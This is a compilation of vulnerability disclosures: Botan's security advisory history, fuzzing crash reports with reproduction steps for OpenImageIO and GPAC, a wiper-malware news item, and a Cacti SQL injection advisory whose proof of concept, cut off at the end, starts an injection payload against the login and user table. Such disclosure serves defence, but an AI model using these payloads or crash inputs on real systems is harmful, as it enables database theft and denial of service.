bcrypt password hashing in Botan before 2.1.0 does not correctly handle passwords with a length between 57 and 72 characters, which makes it easier for attackers to determine the cleartext password.

If you think you have found a security bug in Botan please contact Jack Lloyd (jack@randombit.net). If you would like to encrypt your mail please use:

pub   rsa3072/57123B60 2015-03-23
      Key fingerprint = 4E60 C735 51AF 2188 DF0A  5A62 78E9 8043 5712 3B60
      uid         Jack Lloyd <jack@randombit.net>

This key can be found in the file doc/pgpkey.txt or online at https://keybase.io/jacklloyd and on most PGP keyservers.

**2022¶**

*   2022-11-16: Failure to correctly check OCSP responder embedded certificate
    
    OCSP responses for some end entity are either signed by the issuing CA certificate of the PKI, or an OCSP responder certificate that the PKI authorized to sign responses in their name. In the latter case, the responder certificate (and its validation path certificate) may be embedded into the OCSP response and clients must verify that such certificates are indeed authorized by the CA when validating OCSP responses.
    
    The OCSP implementation failed to verify that an authorized responder certificate embedded in an OCSP response is authorized by the issuing CA. As a result, any valid signature by an embedded certificate passed the check and was allowed to make claims about the revocation status of certificates of any CA.
    
    Attackers that are in a position to spoof OCSP responses for a client could therefore render legitimate certificates of a 3rd party CA as revoked or even use a compromised (and actually revoked) certificate by spoofing an OCSP-“OK” response. E.g. an attacker could exploit this to impersonate a legitimate TLS server using a compromised certificate of that host and get around the revocation check using OCSP stapling.
    
    Introduced in 1.11.34, fixed in 2.19.3
    

**2020¶**

*   2020-12-21 (CVE-2021-24115): Codec encoding/decoding was not constant time
    
    The base64, base32, base58 and hex encoding/decoding routines used lookup tables which could leak information via a cache-based side channel attack. The encoding tables were small and unlikely to be exploitable, but the decoding tables were large enough to cause non-negligible information leakage. In particular parsing an unencrypted PEM-encoded private key within an SGX enclave could be easily attacked to leak key material.
    
    Identified and reported by Jan Wichelmann, Thomas Eisenbarth, Sebastian Berndt, and Florian Sieck.
    
    Fixed in 2.17.3
    
*   2020-07-05: Failure to enforce name constraints on alternative names
    
    The path validation algorithm enforced name constraints on the primary DN included in the certificate but failed to do so against alternative DNs which may be included in the subject alternative name. This would allow a corrupted sub-CA which was constrained by a name constraints extension in its own certificate to issue a certificate containing a prohibited DN. Until 2.15.0, there was no API to access these alternative name DNs so it is unlikely that any application would make incorrect access control decisions on the basis of the incorrect DN. Reported by Mario Korth of Ruhr-Universität Bochum.
    
    Introduced in 1.11.29, fixed in 2.15.0
    
*   2020-03-24: Side channel during CBC padding
    
    The CBC padding operations were not constant time and as a result would leak the length of the plaintext values which were being padded to an attacker running a side channel attack via shared resources such as cache or branch predictor. No information about the contents was leaked, but the length alone might be used to make inferences about the contents. This issue affects TLS CBC ciphersuites as well as CBC encryption using PKCS7 or other similar padding mechanisms. In all cases, the unpadding operations were already constant time and are not affected. Reported by Maximilian Blochberger of Universität Hamburg.
    
    Fixed in 2.14.0, all prior versions affected.
    

**2018¶**

*   2018-12-17 (CVE-2018-20187): Side channel during ECC key generation
    
    A timing side channel during ECC key generation could leak information about the high bits of the secret scalar. Such information allows an attacker to perform a brute force attack on the key somewhat more efficiently than they would otherwise. Found by Ján Jančár using ECTester.
    
    Introduced in 1.11.20, fixed in 2.8.0.
    
*   2018-06-13 (CVE-2018-12435): ECDSA side channel
    
    A side channel in the ECDSA signature operation could allow a local attacker to recover the secret key. Found by Keegan Ryan of NCC Group.
    
    Bug introduced in 2.5.0, fixed in 2.7.0. The 1.10 branch is not affected.
    
*   2018-04-10 (CVE-2018-9860): Memory overread in TLS CBC decryption
    
    An off by one error in TLS CBC decryption meant that for a particular malformed ciphertext, the receiver would miscompute a length field and HMAC exactly 64K bytes of data following the record buffer as if it was part of the message. This cannot be used to leak information since the MAC comparison will subsequently fail and the connection will be closed. However it might be used for denial of service. Found by OSS-Fuzz.
    
    Bug introduced in 1.11.32, fixed in 2.6.0
    
*   2018-03-29 (CVE-2018-9127): Invalid wildcard match
    
    RFC 6125 wildcard matching was incorrectly implemented, so that a wildcard certificate such as b*.domain.com would match any hosts *b*.domain.com instead of just server names beginning with b. The host and certificate would still have to be in the same domain name. Reported by Fabian Weißberg of Rohde and Schwarz Cybersecurity.
    
    Bug introduced in 2.2.0, fixed in 2.5.0
    

**2017¶**

*   2017-10-02 (CVE-2017-14737): Potential side channel using cache information
    
    In the Montgomery exponentiation code, a table of precomputed values is used. An attacker able to analyze which cache lines were accessed (perhaps via an active attack such as Prime+Probe) could recover information about the exponent. Identified in “CacheD: Identifying Cache-Based Timing Channels in Production Software” by Wang, Wang, Liu, Zhang, and Wu (Usenix Security 2017).
    
    Fixed in 1.10.17 and 2.3.0, all prior versions affected.
    
*   2017-07-16: Failure to fully zeroize memory before free
    
    The secure\_allocator type attempts to zeroize memory before freeing it. Due to a error sometimes only a portion of the memory would be zeroed, because of a confusion between the number of elements vs the number of bytes that those elements use. So byte vectors would always be fully zeroed (since the two notions result in the same value), but for example with an array of 32-bit integers, only the first 1/4 of the elements would be zeroed before being deallocated. This may result in information leakage, if an attacker can access memory on the heap. Reported by Roman Pozlevich.
    
    Bug introduced in 1.11.10, fixed in 2.2.0
    
*   2017-04-04 (CVE-2017-2801): Incorrect comparison in X.509 DN strings
    
    Botan’s implementation of X.509 name comparisons had a flaw which could result in an out of bound memory read while processing a specially formed DN. This could potentially be exploited for information disclosure or denial of service, or result in incorrect validation results. Found independently by Aleksandar Nikolic of Cisco Talos, and OSS-Fuzz automated fuzzing infrastructure.
    
    Bug introduced in 1.6.0 or earlier, fixed in 2.1.0 and 1.10.16
    
*   2017-03-23 (CVE-2017-7252): Incorrect bcrypt computation
    
    Botan’s implementation of bcrypt password hashing scheme truncated long passwords at 56 characters, instead of at bcrypt’s standard 72 characters limit. Passwords with lengths between these two bounds could be cracked more easily than should be the case due to the final password bytes being ignored. Found and reported by Solar Designer.
    
    Bug introduced in 1.11.0, fixed in 2.1.0.
    

**2016¶**

*   2016-11-27 (CVE-2016-9132) Integer overflow in BER decoder
    
    While decoding BER length fields, an integer overflow could occur. This could occur while parsing untrusted inputs such as X.509 certificates. The overflow does not seem to lead to any obviously exploitable condition, but exploitation cannot be positively ruled out. Only 32-bit platforms are likely affected; to cause an overflow on 64-bit the parsed data would have to be many gigabytes. Bug found by Falko Strenzke, cryptosource GmbH.
    
    Fixed in 1.10.14 and 1.11.34, all prior versions affected.
    
*   2016-10-26 (CVE-2016-8871) OAEP side channel
    
    A side channel in OAEP decoding could be used to distinguish RSA ciphertexts that did or did not have a leading 0 byte. For an attacker capable of precisely measuring the time taken for OAEP decoding, this could be used as an oracle allowing decryption of arbitrary RSA ciphertexts. Remote exploitation seems difficult as OAEP decoding is always paired with RSA decryption, which takes substantially more (and variable) time, and so will tend to mask the timing channel. This attack does seems well within reach of a local attacker capable of a cache or branch predictor based side channel attack. Finding, analysis, and patch by Juraj Somorovsky.
    
    Introduced in 1.11.29, fixed in 1.11.33
    
*   2016-08-30 (CVE-2016-6878) Undefined behavior in Curve25519
    
    On systems without a native 128-bit integer type, the Curve25519 code invoked undefined behavior. This was known to produce incorrect results on 32-bit ARM when compiled by Clang.
    
    Introduced in 1.11.12, fixed in 1.11.31
    
*   2016-08-30 (CVE-2016-6879) Bad result from X509\_Certificate::allowed\_usage
    
    If allowed\_usage was called with more than one Key\_Usage set in the enum value, the function would return true if _any_ of the allowed usages were set, instead of if _all_ of the allowed usages are set. This could be used to bypass an application key usage check. Credit to Daniel Neus of Rohde & Schwarz Cybersecurity for finding this issue.
    
    Introduced in 1.11.0, fixed in 1.11.31
    
*   2016-03-17 (CVE-2016-2849): ECDSA side channel
    
    ECDSA (and DSA) signature algorithms perform a modular inverse on the signature nonce k. The modular inverse algorithm used had input dependent loops, and it is possible a side channel attack could recover sufficient information about the nonce to eventually recover the ECDSA secret key. Found by Sean Devlin.
    
    Introduced in 1.7.15, fixed in 1.10.13 and 1.11.29
    
*   2016-03-17 (CVE-2016-2850): Failure to enforce TLS policy
    
    TLS v1.2 allows negotiating which signature algorithms and hash functions each side is willing to accept. However received signatures were not actually checked against the specified policy. This had the effect of allowing a server to use an MD5 or SHA-1 signature, even though the default policy prohibits it. The same issue affected client cert authentication.
    
    The TLS client also failed to verify that the ECC curve the server chose to use was one which was acceptable by the client policy.
    
    Introduced in 1.11.0, fixed in 1.11.29
    
*   2016-02-01 (CVE-2016-2196): Overwrite in P-521 reduction
    
    The P-521 reduction function would overwrite zero to one word following the allocated block. This could potentially result in remote code execution or a crash. Found with AFL
    
    Introduced in 1.11.10, fixed in 1.11.27
    
*   2016-02-01 (CVE-2016-2195): Heap overflow on invalid ECC point
    
    The PointGFp constructor did not check that the affine coordinate arguments were less than the prime, but then in curve multiplication assumed that both arguments if multiplied would fit into an integer twice the size of the prime.
    
    The bigint\_mul and bigint\_sqr functions received the size of the output buffer, but only used it to dispatch to a faster algorithm in cases where there was sufficient output space to call an unrolled multiplication function.
    
    The result is a heap overflow accessible via ECC point decoding, which accepted untrusted inputs. This is likely exploitable for remote code execution.
    
    On systems which use the mlock pool allocator, it would allow an attacker to overwrite memory held in secure\_vector objects. After this point the write will hit the guard page at the end of the mmap’ed region so it probably could not be used for code execution directly, but would allow overwriting adjacent key material.
    
    Found by Alex Gaynor fuzzing with AFL
    
    Introduced in 1.9.18, fixed in 1.11.27 and 1.10.11
    
*   2016-02-01 (CVE-2016-2194): Infinite loop in modular square root algorithm
    
    The ressol function implements the Tonelli-Shanks algorithm for finding square roots could be sent into a nearly infinite loop due to a misplaced conditional check. This could occur if a composite modulus is provided, as this algorithm is only defined for primes. This function is exposed to attacker controlled input via the OS2ECP function during ECC point decompression. Found by AFL
    
    Introduced in 1.7.15, fixed in 1.11.27 and 1.10.11
    

**2015¶**

*   2015-11-04: TLS certificate authentication bypass
    
    When the bugs affecting X.509 path validation were fixed in 1.11.22, a check in Credentials\_Manager::verify\_certificate\_chain was accidentally removed which caused path validation failures not to be signaled to the TLS layer. So for affected versions, certificate authentication in TLS is bypassed. As a workaround, applications can override the call and implement the correct check. Reported by Florent Le Coz in GH #324
    
    Introduced in 1.11.22, fixed in 1.11.24
    
*   2015-10-26 (CVE-2015-7824): Padding oracle attack on TLS
    
    A padding oracle attack was possible against TLS CBC ciphersuites because if a certain length check on the packet fields failed, a different alert type than one used for message authentication failure would be returned to the sender. This check triggering would leak information about the value of the padding bytes and could be used to perform iterative decryption.
    
    As with most such oracle attacks, the danger depends on the underlying protocol - HTTP servers are particularly vulnerable. The current analysis suggests that to exploit it an attacker would first have to guess several bytes of plaintext, but again this is quite possible in many situations including HTTP.
    
    Found in a review by Sirrix AG and 3curity GmbH.
    
    Introduced in 1.11.0, fixed in 1.11.22
    
*   2015-10-26 (CVE-2015-7825): Infinite loop during certificate path validation
    
    When evaluating a certificate path, if a loop in the certificate chain was encountered (for instance where C1 certifies C2, which certifies C1) an infinite loop would occur eventually resulting in memory exhaustion. Found in a review by Sirrix AG and 3curity GmbH.
    
    Introduced in 1.11.6, fixed in 1.11.22
    
*   2015-10-26 (CVE-2015-7826): Acceptance of invalid certificate names
    
    RFC 6125 specifies how to match a X.509v3 certificate against a DNS name for application usage.
    
    Otherwise valid certificates using wildcards would be accepted as matching certain hostnames that should they should not according to RFC 6125. For example a certificate issued for *.example.com should match foo.example.com but not example.com or bar.foo.example.com. Previously Botan would accept such a certificate as also valid for bar.foo.example.com.
    
    RFC 6125 also requires that when matching a X.509 certificate against a DNS name, the CN entry is only compared if no subjectAlternativeName entry is available. Previously X509\_Certificate::matches\_dns\_name would always check both names.
    
    Found in a review by Sirrix AG and 3curity GmbH.
    
    Introduced in 1.11.0, fixed in 1.11.22
    
*   2015-10-26 (CVE-2015-7827): PKCS #1 v1.5 decoding was not constant time
    
    During RSA decryption, how long decoding of PKCS #1 v1.5 padding took was input dependent. If these differences could be measured by an attacker, it could be used to mount a Bleichenbacher million-message attack. PKCS #1 v1.5 decoding has been rewritten to use a sequence of operations which do not contain any input-dependent indexes or jumps. Notations for checking constant time blocks with ctgrind (https://github.com/agl/ctgrind) were added to PKCS #1 decoding among other areas. Found in a review by Sirrix AG and 3curity GmbH.
    
    Fixed in 1.11.22 and 1.10.13. Affected all previous versions.
    
*   2015-08-03 (CVE-2015-5726): Crash in BER decoder
    
    The BER decoder would crash due to reading from offset 0 of an empty vector if it encountered a BIT STRING which did not contain any data at all. This can be used to easily crash applications reading untrusted ASN.1 data, but does not seem exploitable for code execution. Found with afl.
    
    Fixed in 1.11.19 and 1.10.10, affected all previous versions of 1.10 and 1.11
    
*   2015-08-03 (CVE-2015-5727): Excess memory allocation in BER decoder
    
    The BER decoder would allocate a fairly arbitrary amount of memory in a length field, even if there was no chance the read request would succeed. This might cause the process to run out of memory or invoke the OOM killer. Found with afl.
    
    Fixed in 1.11.19 and 1.10.10, affected all previous versions of 1.10 and 1.11
    

**2014¶**

*   2014-04-10 (CVE-2014-9742): Insufficient randomness in Miller-Rabin primality check
    
    A bug in the Miller-Rabin primality test resulted in only a single random base being used instead of a sequence of such bases. This increased the probability that a non-prime would be accepted by is\_prime or that a randomly generated prime might actually be composite. The probability of a random 1024 bit number being incorrectly classed as prime with a single base is around 2^-40. Reported by Jeff Marrison.
    
    Introduced in 1.8.3, fixed in 1.10.8 and 1.11.9

CVE-2017-7252: Security Advisories — Botan

Buffer Overflow vulnerability in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_subimage_data function.

Describe the bug:  
Hi, I found heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368.

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert poc /tmp/res

poc file:  
poc.zip

Evidence:  
\==1483==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a3f9 at pc 0x7f8fd7a5f640 bp 0x7ffd22f8daf0 sp 0x7ffd22f8dae8  
READ of size 1 at 0x60200000a3f9 thread T0  
#0 0x7f8fd7a5f63f in OpenImageIO\_v2\_4::GIFInput::read\_subimage\_data() /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:368:65  
#1 0x7f8fd7a57713 in OpenImageIO\_v2\_4::GIFInput::seek\_subimage(int, int) /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:449:10  
#2 0x7f8fd7a559af in OpenImageIO\_v2\_4::GIFInput::open(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, OpenImageIO\_v2\_4::ImageSpec&) /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:165:9  
#3 0x7f8fd75febcf in OpenImageIO\_v2\_4::ImageInput::create(OpenImageIO\_v2\_4::basic\_string\_view<char, std::char\_traits >, bool, OpenImageIO\_v2\_4::ImageSpec const\*, OpenImageIO\_v2\_4::Filesystem::IOProxy\*, OpenImageIO\_v2\_4::basic\_string\_view<char, std::char\_traits >) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageioplugin.cpp:786:27  
#4 0x7f8fd7552674 in OpenImageIO\_v2\_4::ImageInput::open(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, OpenImageIO\_v2\_4::ImageSpec const\*, OpenImageIO\_v2\_4::Filesystem::IOProxy\*) /root/github/oiio-2.4.11.0\_1/src/libOpenImageIO/imageinput.cpp:112:16  
#5 0x564781f3b48f in convert\_file(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&) /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:330:15  
#6 0x564781f4006f in main /root/github/oiio-2.4.11.0\_1/src/iconvert/iconvert.cpp:523:14  
#7 0x7f8fd493fd8f (/lib/x86\_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#8 0x7f8fd493fe3f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)  
#9 0x564781e7ac74 in \_start (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0x40c74) (BuildId: ac1803a32a6497261464974329db9ccd18ce83ad)

0x60200000a3f9 is located 3 bytes to the right of 6-byte region \[0x60200000a3f0,0x60200000a3f6)  
allocated by thread T0 here:  
#0 0x564781efdca8 in \_\_interceptor\_calloc (/root/github/oiio-2.4.11.0\_1/dist/bin/iconvert+0xc3ca8) (BuildId: ac1803a32a6497261464974329db9ccd18ce83ad)  
#1 0x7f8fd22f6b98 in GifMakeMapObject (/lib/x86\_64-linux-gnu/libgif.so.7+0x3b98) (BuildId: 1fff7899d615250f1b273a11e966d1347b233009)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/github/oiio-2.4.11.0\_1/src/gif.imageio/gifinput.cpp:371:65 in OpenImageIO\_v2\_4::GIFInput::read\_subimage\_data()  
Shadow bytes around the buggy address:  
0x0c047fff9420: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa  
0x0c047fff9430: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa  
0x0c047fff9440: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa  
0x0c047fff9450: fa fa 00 fa fa fa 00 fa fa fa fd fa fa fa fd fd  
0x0c047fff9460: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd  
\=>0x0c047fff9470: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 06\[fa\]  
0x0c047fff9480: fa fa 04 fa fa fa 01 fa fa fa fa fa fa fa fa fa  
0x0c047fff9490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff94c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==1483==ABORTING

Platform information:  
OIIO branch/version: 2.4.11  
OS: Linux  
C++ compiler: clang-14.0.6

CVE-2023-42299: heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368 · Issue #3840 · AcademySoftwareFoundation/OpenImageIO

GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42.

**SEGV in MP4Box****Description**

SEGV in gpac/MP4Box.

#0 0x7ffff6798224 in gf\_media\_change\_pl /afltest/gpac/src/media\_tools/isom\_tools.c:3293:42

**Version**

MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_FFMPEG GPAC\_HAS\_VORBIS GPAC\_HAS\_LINUX\_DVB

**ASAN Log**

./MP4Box -add self:svcmode=splitbase:negctts:compat=15 poc3gpac

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3037861==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000002 (pc 0x7ffff6798224 bp 0x00000000000f sp 0x7ffffffec1c0 T0)
==3037861==The signal is caused by a WRITE memory access.
==3037861==Hint: address points to the zero page.
    #0 0x7ffff6798224 in gf\_media\_change\_pl /afltest/gpac/src/media\_tools/isom\_tools.c:3293:42
    #1 0x54edae in import\_file /afltest/gpac/applications/mp4box/fileimport.c:1767:8
    #2 0x4f7d1e in do\_add\_cat /afltest/gpac/applications/mp4box/mp4box.c
    #3 0x4f7d1e in mp4box\_main /afltest/gpac/applications/mp4box/mp4box.c:6196:13
    #4 0x7ffff58cc082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x42adad in \_start (/afltest/gpac/bin/gcc/MP4Box+0x42adad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /afltest/gpac/src/media\_tools/isom\_tools.c:3293:42 in gf\_media\_change\_pl
==3037861==ABORTING

**Reproduction**

git clone https://github.com/gpac/gpac.git
cd gpac
./configure --enable-sanitizer
make -j24

./bin/gcc/MP4Box -add self:svcmode=splitbase:negctts:compat=15 poc3gpac

**PoC**

poc3gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc3gpac

****Impact****

This vulnerability is capable of causing crashes.

**Reference**

https://github.com/gpac/gpac

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang

Song Jiaxuan

CVE-2023-46928: SEGV in gpac/MP4Box in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42 · Issue #2661 · gpac/gpac

GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14.

**SEGV in MP4Box****Description**

SEGV in gpac/MP4Box.

#0 0x7ffff6697edd in gf\_isom\_find\_od\_id\_for\_track /afltest/gpac/src/isomedia/media\_odf.c:522:14

**Version**

MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_FFMPEG GPAC\_HAS\_VORBIS GPAC\_HAS\_LINUX\_DVB

**ASAN Log**

./MP4Box -def -saf -unhint -ocr -out /dev/null poc5gpac

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3351432==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002c (pc 0x7ffff6697edd bp 0x7ffffffe65f0 sp 0x7ffffffe6420 T0)
==3351432==The signal is caused by a READ memory access.
==3351432==Hint: address points to the zero page.
    #0 0x7ffff6697edd in gf\_isom\_find\_od\_id\_for\_track /afltest/gpac/src/isomedia/media\_odf.c:522:14
    #1 0x7ffff6910e8e in gf\_media\_export\_saf /afltest/gpac/src/media\_tools/media\_export.c:851:16
    #2 0x7ffff69121c1 in gf\_media\_export /afltest/gpac/src/media\_tools/media\_export.c:1391:49
    #3 0x4fe755 in mp4box\_main /afltest/gpac/applications/mp4box/mp4box.c:6577:7
    #4 0x7ffff58cc082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x42adad in \_start (/afltest/gpac/bin/gcc/MP4Box+0x42adad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /afltest/gpac/src/isomedia/media\_odf.c:522:14 in gf\_isom\_find\_od\_id\_for\_track
==3351432==ABORTING

**Reproduction**

git clone https://github.com/gpac/gpac.git
cd gpac
./configure --enable-sanitizer
make -j24

./bin/gcc/MP4Box -def -saf -unhint -ocr -out /dev/null poc5gpac

**PoC**

poc5gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc5gpac

****Impact****

This vulnerability is capable of causing crashes.

**Reference**

https://github.com/gpac/gpac

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang

Song Jiaxuan

CVE-2023-46930: SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14 · Issue #2666 · gpac/gpac

tinyfiledialogs (aka tiny file dialogs) before 3.15.0 allows shell metacharacters (such as a backquote or a dollar sign) in titles, messages, and other input data. NOTE: this issue exists because of an incomplete fix for CVE-2020-36767, which only considered single and double quote characters.

**inputbox password WIN OSX GTK QT Console VCPKG C# Lua R Fortran Pascal**

Brought to you by: vareille

CVE-2023-47104: tiny file dialogs (cross-platform C C++) / Git

A pro-Hamas hacktivist group has been observed using a new Linux-based wiper malware dubbed BiBi-Linux Wiper, targeting Israeli entities amidst the ongoing Israeli-Hamas war.
"This malware is an x64 ELF executable, lacking obfuscation or protective measures," Security Joes said in a new report published today. "It allows attackers to specify target folders and can potentially destroy an entire

A pro-Hamas hacktivist group has been observed using a new Linux-based wiper malware dubbed **BiBi-Linux Wiper**, targeting Israeli entities amidst the ongoing Israeli-Hamas war.

"This malware is an x64 ELF executable, lacking obfuscation or protective measures," Security Joes said in a new report published today. "It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions."

Some of its other capabilities include multithreading to corrupt files concurrently to enhance its speed and reach, overwriting files, renaming them with an extension containing the hard-coded string "BiBi" (in the format "\[RANDOM\_NAME\].BiBi\[NUMBER\]"), and excluding certain file types from being corrupted.

"While the string "bibi" (in the filename), may appear random, it holds significant meaning when mixed with topics such as politics in the Middle East, as it is a common nickname used for the Israeli Prime Minister, Benjamin Netanyahu," the cybersecurity company added.

The destructive malware, coded in C/C++ and carrying a file size of 1.2 MB, allows the threat actor to specify target folders via command-line parameters, by default opting for the root directory ("/") if no path is provided. However, performing the action at this level requires root permissions.

Another notable aspect of BiBi-Linux Wiper is its use of the nohup command during execution so as to run it unimpeded in the background. Some of the file types that are skipped from being overwritten are those with the extensions .out or .so.

"This is because the threat relies on files such as bibi-linux.out and nohup.out for its operation, along with shared libraries essential to the Unix/Linux OS (.so files)," the company said.

The development comes as Sekoia revealed that the suspected Hamas-affiliated threat actor known as Arid Viper (aka APT-C-23, Desert Falcon, Gaza Cyber Gang, and Molerats) is likely organized as two sub-groups, with each cluster focused on cyber espionage activities against Israel and Palestine, respectively.

"Targeting individuals is a common practice of Arid Viper," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said in an analysis released last week.

"This includes pre-selected Palestinian and Israeli high-profile targets as well as broader groups, typically from critical sectors such as defense and government organizations, law enforcement, and political parties or movements."

Attack chains orchestrated by the group include social engineering and phishing attacks as initial intrusion vectors to deploy a wide variety of custom malware to spy on its victims. This comprises Micropsia, PyMicropsia, Arid Gopher, and BarbWire, and a new undocumented backdoor called Rusty Viper that's written in Rust.

"Collectively, Arid Viper's arsenal provides diverse spying capabilities such as recording audio with the microphone, detecting inserted flash drives and exfiltrating files from them, and stealing saved browser credentials, to name just a few," ESET noted earlier this month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Hamas Hacktivists Targeting Israeli Entities with Wiper Malware

In International Color Consortium DemoIccMAX 79ecb74, CIccXformMatrixTRC::GetCurve in IccCmm.cpp in libSampleICC.a has a NULL pointer dereference.

CVE-2023-46867: Bugs from Fuzzing · Issue #54 · InternationalColorConsortium/DemoIccMAX

SQL Injection vulnerability in Cacti v1.2.25 allows a remote attacker to obtain sensitive information via the form_actions() function in the managers.php function.

Package cacti Affected versions <=1.2.25 Patched versions None Summary A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information. Details SQL Injection vulnerability discovered in managers.php. In function form\_actions(), request\_var 'selected\_items' is joined into into SQL statements without security checks. source code: function form\_actions() { global $manager\_actions, $manager\_notification\_actions; if (isset\_request\_var('selected\_items')) { if (isset\_request\_var('action\_receivers')) { $selected\_items = cacti\_unserialize(stripslashes(get\_nfilter\_request\_var('selected\_graphs\_array'))); if ($selected\_items != false) { if (get\_nfilter\_request\_var('drp\_action') == '1') { // delete db\_execute('DELETE FROM snmpagent\_managers WHERE id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_managers\_notifications WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_notifications\_log WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '2') { // enable db\_execute("UPDATE snmpagent\_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '3') { // disable db\_execute("UPDATE snmpagent\_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } header('Location: managers.php?header=false'); exit; } PoC $url = \["http://localhost/cacti/", "http://192.168.80.128/cacti/",\]; $url = $url\[1\]; $username = 'admin'; $password = 'password'; $login = "index.php?action=login&login\_username=$username&login\_password=$password"; $injectSQLcode1=serialize(\["1 ) or if ('admin' = (SELECT username FROM user\_auth WHERE id = 1 ), 